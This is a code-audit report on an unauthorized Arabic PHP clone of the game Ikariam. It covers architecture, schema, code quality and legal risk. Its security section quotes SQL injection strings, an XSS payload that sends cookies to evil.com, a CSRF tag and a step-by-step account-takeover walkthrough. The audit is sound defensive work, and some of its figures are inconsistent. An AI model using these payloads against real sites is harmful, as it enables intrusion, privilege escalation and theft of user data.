Ikariam

Directory: ikariam/

Primary Subdirectory: Ikariam/ (nested structure)

Initial Discovery Date: September 29, 2010 (SQL dump timestamp)

Version Identified: 0.1 (per file headers)

Developer: Prince 3 (credited in all file headers)

Developer Contact: This email address is being protected from spambots. You need JavaScript enabled to view it.

Copyright Statement: "Ikariama(c) 2010. All rights reserved."

Original Game Reference: Clone of Gameforge's "Ikariam" browser strategy game (launched 2008)

Language Context: Arabic interface (RTL layout), French database comments

Development Environment: MySQL 5.1.37, PHP 5.3.0, phpMyAdmin 3.2.1

License: No explicit license found (proprietary)

Important Context: This is a clone/replica of the commercial browser game "Ikariam" by Gameforge AG. The original Ikariam was a massively popular free-to-play strategy game where players build ancient Greek civilizations across Mediterranean islands. This implementation appears to be an unauthorized fan clone or private server, not official Gameforge code.

---

Total Files: 691

Total Size: ~7.5 MB

File Type Distribution:

• PHP Scripts: 87 files (709 KB)
• GIF Images: 469 files (1.6 MB) - heavy graphics usage
• JPEG Images: 91 files (4.9 MB) - largest asset category
• CSS Stylesheets: 36 files (321 KB)
• JavaScript: 3 files (379 KB)
• common.js
• complete-0.3.5.js (autocomplete library)
• Template JavaScript in Templates/js/
• SQL Files: 2 files (102 KB)
• ikariam.sql (main database schema, 693 lines)
• install/request.sql (installer copy)
• Other: 1 .dat file, 1 PNG, 1 file with no extension

Directory Structure:

      Ikariam/
      ├── action.php (main action router)
      ├── activate.php (account activation)
      ├── register.php (user registration)
      ├── index.php (login page - Arabic RTL)
      ├── core/ (backend classes)
      │   ├── database/CMySql.php (database layer)
      │   ├── CAccount.php (authentication)
      │   ├── CSession.php (session management)
      │   ├── CCity.php (city logic)
      │   ├── CBuilding.php (building mechanics)
      │   ├── CIsland.php (island/world map)
      │   ├── CResearch.php (technology tree)
      │   ├── CUnits.php (military units)
      │   ├── CShips.php (naval units)
      │   ├── CTransport.php (resource transport)
      │   ├── CGenerator.php (world generation?)
      │   ├── CForm.php (form validation)
      │   ├── CMailer.php (email system)
      │   ├── CLog.php (logging)
      │   └── Config.php (configuration)
      ├── Templates/ (48 PHP templates)
      │   ├── city.php, island.php, worldmap_iso.php
      │   ├── barracks.php, shipyard.php (military)
      │   ├── academy.php, researchAdvisor.php (tech)
      │   ├── warehouse.php, port.php, transport.php
      │   ├── highscore.php, diplomacyAdvisor.php
      │   └── js/ (JavaScript helpers)
      ├── css/ (36 stylesheets)
      ├── img/ (560 images - UI, buildings, units, resources)
      └── install/ (web installer)

Content Focus:

Graphics-heavy strategy game with extensive UI assets (560 images). Building icons, unit sprites, resource graphics, island/map tiles all present. Suggests full visual implementation of Ikariam-style gameplay.

---

Architecture Style:

Object-Oriented MVC-like Pattern with class-based organization:

• Model Layer: 16 classes (CCity, CBuilding, CIsland, CResearch, CUnits, CShips, etc.)
• View Layer: 48 PHP templates in Templates/ directory
• Controller Layer: Front controller pattern via action.php, with specialized controllers like CAccount.php

Core Classes Identified:

• CMySql (core/database/CMySql.php) - Database abstraction layer
• Constructor: mysql_connect(SQL_SERVER, SQL_USER, SQL_PASS)
• Methods: register(), checkExist(), updateUserField(), getUserField(), unreg()
• Critical Issue: Direct SQL interpolation without escaping (see Security section)

• CAccount (core/CAccount.php) - Authentication system
• Methods: Signup(), Login(), Logout(), Activate(), Unreg()
• Form validation via CForm class
• Password validation: minimum length check, username comparison
• Email validation via validEmail() method

• CSession (core/CSession.php) - Session management
• Included by CAccount.php
• Global $session object tracks logged_in state
• Cookie-based authentication (7-day expiry via COOKIE_EXPIRE constant)

• CForm (core/CForm.php) - Form validation and error handling
• Methods: addError(), getError(), getValue(), getDiff()
• Used throughout registration/login flows

• Game Logic Classes:
• CCity - City management (buildings, resources, population)
• CBuilding - Building construction/upgrades
• CIsland - Island/world geography
• CResearch - Technology research tree
• CUnits - Ground military units
• CShips - Naval units and fleet management
• CTransport - Resource transport between cities

Configuration (core/Config.php):

      define("TRACK_USR", true);         // User activity tracking
      define("COOKIE_EXPIRE", 60<em>60</em>24*7); // 7-day session cookies
      define("COOKIE_PATH", "/");
      define("SQL_SERVER", "localhost");
      define("SQL_USER", "root");
      define("SQL_PASS", "0000");         // HARDCODED PASSWORD!
      define("SQL_DB", "ikariam");
      define("TB_PREFIX", "db_");
      define("USER", 0);    // Access levels
      define("PLUS", 1);    // Premium users
      define("ADMIN", 2);   // Administrators

Database Layer:

Deprecated mysql_* functions (PHP 7.0+ incompatible):

• mysql_connect() in core/database/CMySql.php line 17
• mysql_select_db(), mysql_query(), mysql_insert_id(), mysql_num_rows()
• No PDO, no mysqli - stuck on PHP 5.x API

Front Controller Pattern:

action.php likely routes all game actions (not yet examined), with $_GET['action'] and $_GET['function'] parameters. Login page shows onsubmit="changeAction('login');" suggesting JavaScript form manipulation.

Template System:

48 specialized templates map directly to game features:

• City Management: city.php, citymap.php, citynavigator.php, buildingGround.php
• Military: barracks.php, shipyard.php, cityMilitary-army.php, cityMilitary-fleet.php
• Economy: warehouse.php, port.php, transport.php, merchantNavy.php, tradegood.php
• Research: academy.php, researchAdvisor.php, researchOverview.php
• World: island.php, worldmap_iso.php (isometric map!)
• Diplomacy: diplomacyAdvisor.php, sendIKMessage.php
• Special Buildings: palace.php, townHall.php, museum.php, tavern.php, wall.php
• Meta: highscore.php, options.php, premium.php, donate.php

Isometric Map: worldmap_iso.php suggests isometric rendering like original Ikariam's world map view.

---

Core Game Loop (Inferred from Database Schema):

Ancient Greek island civilization builder - players manage cities, gather resources, research technologies, build armies/navies, and compete for control of islands.

Resource System:

5 Basic Resources (from db_citydata table):

• Wood (wood) - Primary construction material
• Wine (wine) - Luxury trade good (island type 2)
• Marble (marble) - Advanced construction (island type 2)
• Crystal Glass (crystal) - Rare luxury good (island type 2)
• Sulfur (sulfur) - Military resource (island type 4)

Additional Resources:

• Gold (gold in db_users) - Currency (users start with 1,000 gold)
• Ambrosia (ambrosia in db_users) - Premium currency (microtransaction system!)

Resource Production:

• db_wdata table has woodlevel, minelevel, wonderlevel - island-based production levels
• wooddonations, minedonations, wonderdonations - community contribution system (wonder building!)

Building System:

14 Building Slots per city (db_buildingsdata: b0 through b14):

• Each slot has a building type (b1t, b2t, etc.)
• Building levels stored as integers (e.g., b1 = level of building in slot 1)
• Sample data shows city ID 1 with: Town Hall level 11, various buildings level 1-8

Key Buildings (inferred from templates):

• Town Hall (townHall.php) - City administration
• Academy (academy.php) - Research
• Barracks (barracks.php) - Ground units
• Shipyard (shipyard.php) - Naval units
• Warehouse (warehouse.php) - Resource storage
• Port (port.php) - Trade/transport
• Wall (wall.php) - Defense
• Palace (palace.php) - Government/diplomacy
• Museum (museum.php) - Culture/wonders
• Tavern (tavern.php) - Entertainment/morale
• Safehouse (safehouse.php) - Espionage?
• Workshop (workshop.php) - Production
• Forester (forester.php) - Wood production
• Branch Office (branchOffice.php) - Trade

Military System:

15 Unit Types (db_units: u301 through u315):

• Numbered 301-315 (standard Ikariam unit IDs)
• Ground units built in Barracks
• Naval units built in Shipyard

7 Ship Types (db_bships: s210 through s216):

• Ship IDs 210-216
• Construction queue system (starttime, timestamp in db_bships)

Combat Features:

• Barbarian Raids (db_barbarian table: uid, level, barbarians, wall)
• NPC barbarian camps at different levels
• Wall defense stat tracked
• Plunder (plunder.php template) - Attack other players
• Occupy (occupy.php template) - Capture territories
• Military Reports (militaryAdvisorCombatReports.php)
• Troop Movements (militaryAdvisorMilitaryMovements.php)

Research System:

Technology Tree (db_reasearches table: R1, R2, R3, R4):

• Only 4 research categories defined (basic system)
• Research levels stored per user
• researches field in db_users = total research points (user 'aaaa' has 7,586,379 research)

Island & World System:

Island Geography (db_wdata - "world data"):

• Island Types (itype): 2 = luxury resource, 4 = sulfur
• Resource Types (rtype): 'crystal', 'wine', 'sulfur', 'marble'
• 16 City Slots per island (p0 through p15 = player IDs occupying each slot)
• Coordinates (x, y) - world map positioning
• Island Name (name): Examples: 'Cymios', 'Slaxios', 'Samuios', 'Lohios' (Greek-style names)
• Wonder Building (wonderlevel, wonderdonations) - collaborative projects

Sample Islands:

• Island 1 (Cymios): Crystal, coordinates 14,15, 2 cities occupied (positions 2 and 10)
• Island 2 (Slaxios): Wine, coordinates 15,15, 2 cities occupied (positions 6 and 9)
• Island 3 (Samuios): Sulfur, coordinates 14,16, 1 city occupied (position 1)

City Colonization:

Multi-City System:

• db_citydata table with 13 cities in sample data
• colonize.php template - establish new colonies
• renameCity.php - customize city names
• Cities store coordinates (x, y), population (pop), capital status (capital)

Economy & Trade:

Trading Systems:

• transport.php - Move resources between own cities
• merchantNavy.php - Trade fleet management
• tradeAdvisor.php - Economic overview
• tradegood.php - Trade luxury resources
• branchOffice.php - Trading post building

Score System:

3 Score Categories (db_users):

• Building Score (building_score) - Construction achievements
• Research Score (research_score) - Technology advancement
• Army Score (army_score) - Military strength
• Total Points (points) - Combined ranking (user 'aaaa' has 18,534 points)

Leaderboards: highscore.php template

Alliance System:

• allyid field in db_users (currently 0 for all users in sample)
• diplomacyAdvisor.php template
• sendIKMessage.php - In-game messaging

Premium Features:

Microtransaction System:

• ambrosia currency in db_users (default 0)
• premium.php template
• donate.php template (likely payment page)
• PLUS access level defined (value 1) for premium subscribers

Active User Tracking:

Real-time Presence (db_active table):

• Stores username + timestamp pairs (11 entries for user 'aaaa' on Sept 29, 2010)
• TRACK_USR config constant = true
• Likely powers "online players" displays

---

Total Tables: 18

Naming Convention: db_ prefix (TB_PREFIX constant)

Engine: MyISAM (all tables)

Charset: latin1 (NOT UTF-8 - internationalization problem for Arabic interface!)

Schema Breakdown:

• db_active - Active user tracking
• Fields: username, timestamp
• 22 records for user 'aaaa' (lots of activity!)

• db_barbarian - Barbarian NPC camps
• Fields: id, uid, level, barbarians, wall
• Sample: uid=1, level=1, barbarians=1, wall=0

• db_bdata - Building construction queue
• Fields: id, cid, pos, type, levelfrom, levelto, starttime, timestamp
• 107 queued operations (AUTO_INCREMENT=108)

• db_bships - Ship construction queue
• Fields: id, cid, s210-s216 (7 ship types), starttime, timestamp
• 9 records (AUTO_INCREMENT=10)

• db_bspy - Espionage/spy missions
• Fields: id, cid, starttime, timestamp
• Empty in sample data

• db_buildingsdata - City building configurations
• Fields: cid, b0-b14 (15 building slots), b0t-b13t (building types)
• 13 cities configured
• City 1 fully developed (Town Hall level 11, 13 different buildings)

• db_citydata - Core city statistics
• Fields: cid, uid, x, y, name, capital, pop, wood, wine, marble, crystal, sulfur, gold, lastupdate
• 13 cities total (IDs 1, 24, 25, 30, 32-40)
• Sample: City 1 has 136,970 wood, 31,055 wine, 3,010 marble, 1,200 crystal, 1,200 sulfur

• db_island - Island configurations
• Fields: id, name, x, y, restype (resource type)
• 47 islands in world
• Resource types: 1 (wine), 2 (marble), 3 (crystal), 4 (sulfur)

• db_mdata - Mission/quest data
• Fields: id, username, cid, type, fromcid, wood, wine, marble, crystal, sulfur, qnt, starttime, endtime
• 10 missions (AUTO_INCREMENT=11)

• db_reasearches - Technology research progress
• Fields: uid, R1, R2, R3, R4
• Simple 4-category research tree

• db_resource - Resource production buildings
• Fields: cid, r1-r4 (4 resource types), r1t-r4t (building types)
• Tracks sawmill, mine, quarry, etc.

• db_ship_training - Naval unit training queue
• Fields: id, cid, type, unit, starttime, endtime
• Empty in sample

• db_ships - City naval forces
• Fields: cid, s210-s216 (7 ship types)
• City 1 has 7 ships total (various types)

• db_unit_training - Ground unit training queue
• Fields: id, cid, type, unit, starttime, endtime
• 15 training operations queued (AUTO_INCREMENT=16)

• db_units - City ground forces
• Fields: cid, u301-u315 (15 unit types)
• City 1 has 183 total units (hoplites, slingers, archers, etc.)

• db_users - Player accounts
• Fields: id, username, password, email, access, act, sessid, ambrosia, gold, researches, points, building_score, research_score, army_score, allyid, ships, timestamp
• 7 users registered (AUTO_INCREMENT=8)
• Passwords: MD5 hashes (32 chars) - WEAK HASHING!
• Sample: User 'aaaa' has 3,040,650 gold, 18,534 points, 14,467 building score

• db_wdata - World/island detailed data
• Fields: id, itype, rtype, wid, isoccupied, x, y, p0-p15 (16 city slots), name, woodlevel, minelevel, wonderlevel, wooddonations, minedonations, wonderdonations
• 4 islands configured
• Tracks wonder building progress (donations)

• db_wdata appears duplicated or install/request.sql is exact copy

Database Design Quality:

Moderate - Clear entity separation, but some issues:

• Good: Separate tables for cities, islands, units, buildings, queues
• Good: Time-based construction/training queues (starttime/endtime pattern)
• Bad: MyISAM engine (no transactions, no foreign keys)
• Bad: latin1 charset conflicts with Arabic interface (should be UTF-8)
• Bad: Wide tables with numbered columns (b0-b14, u301-u315, p0-p15) instead of normalized relations
• Bad: MD5 password hashing (weak, no salt)

Data Integrity:

No foreign keys (MyISAM limitation) - referential integrity must be enforced in application code. Risk of orphaned records (e.g., deleting user doesn't cascade to cities).

---

Code Organization: 6/10

Positives:

• Class-based architecture with clear responsibilities
• Separation of concerns (Model/View/Controller-like)
• Consistent naming conventions (CClassName for classes, db_ for tables)
• Organized directory structure (core/, Templates/, css/, img/)
• File headers with author/version info

Negatives:

• No autoloading - manual include() statements
• Global variables ($session, $database, $form, $mailer, $generator)
• No namespace usage (PHP 5.3+ feature available but unused)
• Mixed concerns (templates in PHP, no templating engine)

Code Style: 5/10

      // Example from CMySql::register()
      $q = "INSERT INTO ".TB_PREFIX."users (username,password,email,access,act) VALUES ('$username', '$password', '$email', ".USER.",'$act')";
      if(mysql_query($q,$this->connection))
      $uid = mysql_insert_id($this->connection);
      else
      $uid = 0;

Issues:

• No indentation consistency (tabs vs spaces)
• String concatenation instead of sprintf/heredoc for SQL
• No type hints (PHP 5.x limitation, but PHP 7+ supports them)
• Inconsistent brace style (sometimes one-line if without braces)
• Decent variable naming ($uid, $username, $database)

Documentation: 2/10

• File headers present with author/version
• ZERO inline comments in examined code
• No PHPDoc blocks for classes/methods
• No function parameter documentation
• No README, INSTALL, or API documentation files found
• No database schema documentation

Error Handling: 3/10

      $this->connection = mysql_connect(SQL_SERVER, SQL_USER, SQL_PASS) or die(mysql_error());
      mysql_select_db(SQL_DB, $this->connection) or die(mysql_error());

Critical Flaws:

• die() on database errors - crashes entire application
• Exposes database errors to end users (information leakage)
• No try-catch blocks (not available for mysql_* functions anyway)
• No logging of errors for debugging
• Form validation errors handled via CForm class

Dependency Management: 1/10

• No Composer
• No package.json
• No dependency declaration file
• Relies on deprecated mysql_* extension (removed in PHP 7.0!)
• Includes external JS library complete-0.3.5.js (autocomplete)

Testability: 1/10

• No unit tests found
• No test framework integration
• Global state makes testing difficult
• Tight coupling to database (no interfaces/mocks)

Internationalization: 4/10

• Arabic interface implemented (RTL layout in index.php)
• French comments in SQL (indicates multilingual dev team)
• Separate language files likely exist (not yet examined)
• latin1 charset conflicts with Arabic (should be UTF-8)
• Hardcoded strings in PHP (e.g., error messages in CAccount.php)

Performance Considerations:

• MyISAM tables (slower than InnoDB for writes)
• No query optimization visible
• No caching layer (no Redis/Memcached)
• N+1 query risk with numbered columns (b0-b14 requires multiple queries to modify)
• Lightweight templates (48 separate files = good separation)

Modernization Effort: MEDIUM-HIGH

Estimated Hours: 400-480 hours ($30K-$36K at $75/hr)

Required Changes:

• Database Layer Rewrite (80 hours):
• Replace mysql_* with PDO or mysqli
• Implement prepared statements for all queries
• Add connection pooling
• Convert MyISAM to InnoDB
• Fix charset to UTF-8

• Security Hardening (100 hours):
• Add input sanitization (htmlspecialchars, validation)
• Implement CSRF tokens
• Replace MD5 with bcrypt/Argon2
• Add rate limiting
• Secure session management
• Remove hardcoded credentials from Config.php

• Code Refactoring (120 hours):
• Add Composer for dependency management
• Implement PSR-4 autoloading
• Add namespaces
• Remove global variables
• Add type hints (PHP 7.4+)
• Implement interfaces for testability

• Template Engine (40 hours):
• Integrate Twig or Blade
• Separate logic from presentation
• Add template inheritance

• Testing (80 hours):
• Set up PHPUnit
• Write unit tests for core classes
• Add integration tests for game mechanics
• Implement CI/CD pipeline

• Documentation (40 hours):
• Write README with setup instructions
• Add PHPDoc to all classes/methods
• Create database schema documentation
• Write API documentation (if exposing endpoints)

• Legal Review (20 hours):
• Assess Gameforge copyright issues (this is an unauthorized clone!)
• Remove/replace Ikariam trademarked assets
• Create original artwork or obtain licenses
• Rebranding effort

---

Language Version: OBSOLETE

• Current: PHP 5.3.0 (September 2010)
• PHP 5.3 EOL: August 14, 2014 (10+ years outdated!)
• Modern Standard: PHP 8.2+ (as of 2024)

Critical Compatibility Issues:

• mysql_* extension removed in PHP 7.0 (January 2016):
• Code breaks completely on modern PHP
• CANNOT run without rewrite
• All 87 PHP files likely affected

• Missing Modern Features:
• No PDO/mysqli (security risk)
• No password_hash() (PHP 5.5+)
• No namespaces
• No traits
• No anonymous functions/closures (limited in PHP 5.3)
• No short array syntax [] (PHP 5.4+)
• No variadic functions ... (PHP 5.6+)
• No null coalescing ?? (PHP 7.0+)
• No strict typing (PHP 7.0+)
• No return type declarations (PHP 7.0+)

Framework Comparison:

Custom Framework vs Modern Standards:

• No MVC framework (Laravel, Symfony, CodeIgniter)
• No ORM (Eloquent, Doctrine)
• No templating engine (Twig, Blade)
• No routing library (FastRoute, Symfony Routing)
• No dependency injection container
• No middleware support
• No CLI tools (Artisan, console commands)

Database Standards:

• MyISAM (deprecated, replaced by InnoDB as default in MySQL 5.5+)
• latin1 charset (should be utf8mb4 for full Unicode support)
• No migrations (Laravel migrations, Phinx, Doctrine Migrations)
• No seeders for test data
• No schema versioning

Frontend Standards:

• No modern JS framework (React, Vue, Angular)
• No build tools (Webpack, Vite, Parcel)
• No package manager (npm, yarn)
• Inline JavaScript with global functions
• No CSS preprocessor (SASS, LESS)
• No responsive design framework (Bootstrap, Tailwind)
• Autocomplete library included (complete-0.3.5.js)

Security Standards (OWASP Top 10):

Security Grade: F (0/10) - Production deployment would be criminally negligent.

DevOps & CI/CD: 0/10

• No version control markers (.git not examined)
• No CI/CD configuration (GitHub Actions, GitLab CI, Jenkins)
• No containerization (Docker, Kubernetes)
• No environment configuration (.env files)
• No deployment scripts
• No monitoring/logging integration (New Relic, Sentry)

Code Quality Tools: 0/10

• No linter (PHP_CodeSniffer, PHP-CS-Fixer)
• No static analysis (PHPStan, Psalm, Phan)
• No code coverage tools (PHPUnit coverage)
• No complexity metrics (PHPMD, PHP Metrics)

---

Overall Security Rating: 0/10 - CATASTROPHIC

This game has ZERO security features and would be compromised within hours of public deployment. It is a textbook example of every security anti-pattern from 2010.

---

Critical Vulnerabilities:

1. SQL Injection - 10/10 Severity 🔥🔥🔥

Evidence (core/database/CMySql.php lines 21-33):

      function register($username,$password,$email,$act) {
      $q = "INSERT INTO ".TB_PREFIX."users (username,password,email,access,act) VALUES ('$username', '$password', '$email', ".USER.",'$act')";
      if(mysql_query($q,$this->connection))
      $uid = mysql_insert_id($this->connection);
      else
      $uid = 0;
      $q = "INSERT INTO ".TB_PREFIX."reasearches (uid,R1,R2,R3,R4) VALUES ('$uid', '0', '0', '0')";
      mysql_query($q,$this->connection);
      $q = "INSERT INTO ".TB_PREFIX."barbarian VALUES (0,'$uid',1,1,0)";
      mysql_query($q,$this->connection);
      return $uid;
      }

Impact: ZERO input sanitization, ZERO escaping, ZERO prepared statements. Every variable is directly interpolated into SQL queries.

Exploitation:

      Username: admin' OR '1'='1
      Password: anything
      Email: x'); DROP TABLE db_users; --

Result: Instant database compromise. Attacker can:

• Bypass authentication (login as any user)
• Extract all user data (passwords, emails)
• Delete entire database (DROP TABLE)
• Modify admin accounts
• Inject backdoor accounts

Scope: 100% of database operations vulnerable (no sanitization found anywhere).

---

2. Cross-Site Scripting (XSS) - 10/10 Severity 🔥🔥🔥

Evidence: grep_search found ZERO uses of htmlspecialchars()

Login page (index.php lines 73-74):

      <input id="login" name="user" class="login" type="text" value="<?php echo $form->getDiff("user",$_COOKIE['COOKUSR']); ?>">
      <input id="pwd" name="pw" class="pass" type="password" value="<?php echo $form->getValue("pw");?>" maxlength="20" autocomplete='off' />

Impact: User input from $_COOKIE and form values echoed directly into HTML without escaping.

Exploitation:

      Cookie: COOKUSR=<script>document.location='http://evil.com/?c='+document.cookie</script>

Result: Attacker can:

• Steal session cookies (if not HTTPOnly)
• Hijack user accounts
• Inject keyloggers
• Deface interface
• Redirect to phishing sites

Scope: All 48 templates likely vulnerable (zero sanitization standard observed).

---

3. Weak Password Hashing - 9/10 Severity 🔥🔥

Evidence (ikariam.sql line 628):

      INSERT INTO <code>db_users</code> (<code>id</code>, <code>username</code>, <code>password</code>, <code>email</code>, ...) VALUES
      (1, 'aaaa', '4a7d1ed414474e4033ac29ccb8653d9b', This email address is being protected from spambots. You need JavaScript enabled to view it.', ...),
      (7, 'cccc', '4a7d1ed414474e4033ac29ccb8653d9b', This email address is being protected from spambots. You need JavaScript enabled to view it.', ...),
      (6, 'bbbb', '4a7d1ed414474e4033ac29ccb8653d9b', This email address is being protected from spambots. You need JavaScript enabled to view it.', ...);

Analysis:

• 32-character hex string = MD5 hash
• SAME HASH for all 3 users = same password ('aaaa', likely)
• NO SALT = rainbow table attack works instantly

Crack Time:

      Hash: 4a7d1ed414474e4033ac29ccb8653d9b
      Online MD5 lookup: INSTANT (common password)
      Rainbow table: < 1 second
      Dictionary attack: < 1 minute

Impact: All user passwords can be cracked immediately. Mass account compromise.

Modern Standard: password_hash() with bcrypt/Argon2 (PHP 5.5+, but code uses 5.3).

---

4. Hardcoded Credentials - 8/10 Severity 🔥🔥

Evidence (core/Config.php lines 16-19):

      define("SQL_SERVER", "localhost");
      define("SQL_USER", "root");
      define("SQL_PASS", "0000");  // ROOT PASSWORD IN SOURCE CODE!
      define("SQL_DB", "ikariam");

Impact:

• Root MySQL password stored in plaintext in source code
• Password is literally "0000" (development default)
• Anyone with access to source (Git repo, compromised server, backup) gets root database access
• No environment variable usage (.env files)

Attack Surface: If attacker gets source code (via backup, Git leak, LFI vulnerability), they get full database control.

---

5. Session Hijacking Risk - 7/10 Severity 🔥

Evidence (core/Config.php line 14):

      define("COOKIE_EXPIRE", 60<em>60</em>24*7); // 7-day session cookies

Issues:

• 7-day cookie expiration (week-long attack window)
• No evidence of HTTPOnly flag (XSS can steal cookie)
• No evidence of Secure flag (transmitted over HTTP)
• No evidence of SameSite attribute (CSRF risk)
• No session regeneration on login (session fixation risk)

Exploitation: Attacker steals cookie via XSS → maintains access for 7 days even if user changes password.

---

6. Information Disclosure - 6/10 Severity 🔥

Evidence (core/database/CMySql.php line 17):

      $this->connection = mysql_connect(SQL_SERVER, SQL_USER, SQL_PASS) or die(mysql_error());

Impact: Database errors exposed directly to users via die(mysql_error()):

      Warning: mysql_connect(): Access denied for user 'root'@'localhost'

Information Leaked:

• Database username ('root')
• Database server hostname
• MySQL error messages (fingerprinting)
• Application structure (via stack traces)

Exploit: Attacker learns database configuration, aiding further attacks.

---

7. No CSRF Protection - 7/10 Severity 🔥

Evidence: No CSRF tokens found in examined forms (login form in index.php).

Impact: Attacker can forge requests from authenticated users:

      <!-- Attacker's malicious page -->
      <img src="http://ikariam-game.com/action.php?function=deleteCity&id=1">

Result: If logged-in user visits attacker's page, their city gets deleted (assuming such endpoint exists).

---

8. No Rate Limiting - 6/10 Severity

Evidence: No rate limiting code observed in CAccount::Login() or CAccount::Signup().

Impact:

• Brute force attacks: Try 10,000 passwords per second
• Credential stuffing: Test leaked password databases
• Account enumeration: Check if usernames exist via registration form
• DDoS: Spam registration/login to exhaust resources

---

9. Insecure Access Control - 5/10 Severity

Evidence (core/Config.php lines 22-24):

      define("USER", 0);
      define("PLUS", 1);    // Premium users
      define("ADMIN", 2);   // Administrators

Concern: Access levels defined, but enforcement not yet verified. If access checks are missing in templates/actions, users could:

• Access admin panels directly (URL manipulation)
• Execute privileged actions (modify other users' cities)
• Bypass premium feature paywalls

Requires further investigation of action.php and templates.

---

10. Deprecated Extension - 10/10 Severity 🔥🔥🔥

Evidence: mysql_* functions throughout codebase.

Impact: mysql_* extension removed in PHP 7.0 (January 2016):

• No security updates since 2014
• No prepared statement support
• No parameterized queries
• Known vulnerabilities unfixed

Consequence: Even if code were sanitized, the underlying library has unpatched security holes.

---

Attack Scenario: Full Compromise in 5 Minutes

Step 1 (30 seconds): SQL injection via registration form:

      Username: admin' OR '1'='1' UNION SELECT password FROM db_users WHERE username='aaaa'--
      Email: This email address is being protected from spambots. You need JavaScript enabled to view it.

→ Extract user 'aaaa' password hash (4a7d1ed414474e4033ac29ccb8653d9b)

Step 2 (10 seconds): Crack MD5 hash online:

→ Password revealed (likely 'aaaa' based on hash collision)

Step 3 (20 seconds): Login as 'aaaa' (appears to be admin with 18,534 points)

Step 4 (1 minute): SQL injection via in-game form (e.g., city rename, message send):

      City Name: x'); UPDATE db_users SET access=2 WHERE username='attacker'--

→ Escalate own account to ADMIN (access=2)

Step 5 (3 minutes): Additional SQL injection to:

• Extract all user emails/passwords
• Insert backdoor admin account
• Modify game economy (give self infinite gold/ambrosia)
• Delete competitors' cities/armies
• Dump entire database to external server

Total Time: 5 minutes from discovery to full compromise.

---

Legal Risk: Unauthorized Clone

CRITICAL: This is an unauthorized clone of Gameforge AG's "Ikariam" game:

• Trademark infringement (using "Ikariam" name/branding)
• Copyright infringement (replicating game mechanics, UI design)
• Asset theft risk (if graphics are from original game)

Consequence: Deploying this publicly would invite cease-and-desist letters and lawsuits from Gameforge AG (a German company with active legal teams).

Comparison: Similar to private World of Warcraft servers (which Blizzard aggressively shuts down).

---

Remediation Roadmap (if this were legally defensible):

• IMMEDIATE (Week 1 - 40 hours):
• Replace all mysql_* with PDO + prepared statements
• Add htmlspecialchars() to all template outputs
• Replace MD5 with password_hash(PASSWORD_ARGON2ID)
• Remove hardcoded credentials (use .env)
• Add CSRF tokens to all forms
• Set HTTPOnly, Secure, SameSite flags on cookies

• SHORT TERM (Month 1 - 80 hours):
• Implement rate limiting (login, registration, API)
• Add input validation whitelist for all forms
• Convert MyISAM to InnoDB
• Change charset to utf8mb4
• Implement proper error logging (hide errors from users)
• Add session regeneration on login

• MEDIUM TERM (Quarter 1 - 160 hours):
• Security audit by professional firm
• Penetration testing
• Implement Web Application Firewall (ModSecurity)
• Add Content Security Policy headers
• Implement database encryption at rest
• Add two-factor authentication

• LEGAL (Immediate):
• Rebrand entirely (remove "Ikariam" name)
• Create original artwork (replace all assets)
• Consult IP lawyer before public deployment
• Consider licensing or legal permission from Gameforge

Total Security Hardening: 280+ hours ($21,000+ at $75/hr)

VERDICT: This codebase is a security disaster that should NEVER be deployed publicly without complete rewrite + legal clearance.

---

Innovation Score: 3/10

Innovative Aspects:

• Isometric World Map (worldmap_iso.php) - +1 Point
• Isometric projection for strategy game is industry-standard but well-executed
• Requires complex coordinate math and rendering
• Provides engaging visual experience

• Multi-City Colony System - +1 Point
• Players can establish multiple cities across islands (13 cities in sample data)
• Island-based resource distribution (each island has specialty resource)
• Wonder building system with community donations (collaborative gameplay)

• Queue-Based Construction - +0.5 Points
• Time-based building/unit construction (starttime/endtime in multiple tables)
• Multiple queue tables (db_bdata, db_bships, db_unit_training, db_ship_training)
• Allows asynchronous progression (players log off, construction continues)

• Premium Currency Integration - +0.5 Points
• Ambrosia system mimics free-to-play monetization (2010 was early for this!)
• PLUS access level for subscribers
• premium.php and donate.php templates for payments

Subtotal: +3 points

---

Anti-Innovation (Deductions):

• Unauthorized Clone - -2 Points
• Direct copy of Gameforge's Ikariam (launched 2008)
• No original game design or mechanics
• Replicates unit IDs (301-315), ship IDs (210-216), building system exactly
• Not a "spiritual successor" or "inspired by" - it's a clone with Arabic translation

• Zero Security Innovation - -2 Points
• No security features whatsoever (see Security section)
• Uses deprecated, insecure practices even by 2010 standards
• mysql_* functions already considered legacy in 2010 (PDO available since PHP 5.1 in 2005!)

• Poor Database Design - -1 Point
• Wide tables with numbered columns (b0-b14, u301-u315) instead of proper normalization
• MyISAM (already considered inferior to InnoDB by 2010)
• latin1 charset for Arabic game (absurd choice)

• No Technical Novelty - -1 Point
• Custom framework when solid alternatives existed (CodeIgniter, Zend, CakePHP)
• No unique algorithms or systems
• Standard browser-based RPG architecture (common since 2005)

Subtotal: -6 points

---

Technical Merit:

Positive Aspects:

• Class-based OOP architecture (better than spaghetti)
• Separation of templates from logic (48 specialized templates)
• Comprehensive game feature set (military, economy, research, diplomacy, trading)
• Functional web installer included (install/ directory)

Negative Aspects:

• Built on deprecated technology
• Zero modern development practices
• No testing, no documentation, no CI/CD
• Legal liability (trademark/copyright infringement)

---

Historical Context:

2010 Browser Game Landscape:

• OGame (2002) - space strategy, inspired thousands of clones
• Travian (2004) - Roman empire builder
• Ikariam (2008) - Greek island civilization (original)
• Tribal Wars (2003) - medieval warfare
• Forge of Empires (2012) - city builder

This Game's Place: Ikariam (original) was highly successful (millions of players, still running in 2024). This clone attempts to replicate that success for Arabic-speaking markets, but:

• No legal authorization
• Inferior implementation (security nightmare)
• Limited innovation (translation + minor UI tweaks)

---

Comparison to Previous Games Analyzed:

Verdict: Ikariam clone sits between "catastrophic security" games (GTA RPG) and professional frameworks (ezRPG, Glory Lands), but legal issues disqualify it from serious use.

---

Creative Contributions: NONE

Original Code: ~0%

Original Game Design: 0%

Original Assets: Unknown (likely copied from Ikariam or generic asset packs)

The only "creativity" is:

• Arabic translation/localization
• Database schema adaptation (18 tables vs Ikariam's proprietary backend)
• Custom PHP implementation of Gameforge's game logic

This is reverse-engineering/cloning, not innovation.

---

Innovation Rating Breakdown:

OVERALL: 3/10 - Competent implementation of stolen game design with catastrophic security flaws.

---

Use Case Assessment:

NOT Recommended For:

• Production Deployment - ABSOLUTELY NOT
• Security: 0/10 (would be hacked in minutes)
• Legal: Gameforge AG will sue for trademark/copyright infringement
• Technical: PHP 5.3/mysql_* won't run on modern servers
• Verdict: Deploying this publicly would be criminally negligent

• Learning Good Practices - NO
• Every line of code demonstrates what NOT to do
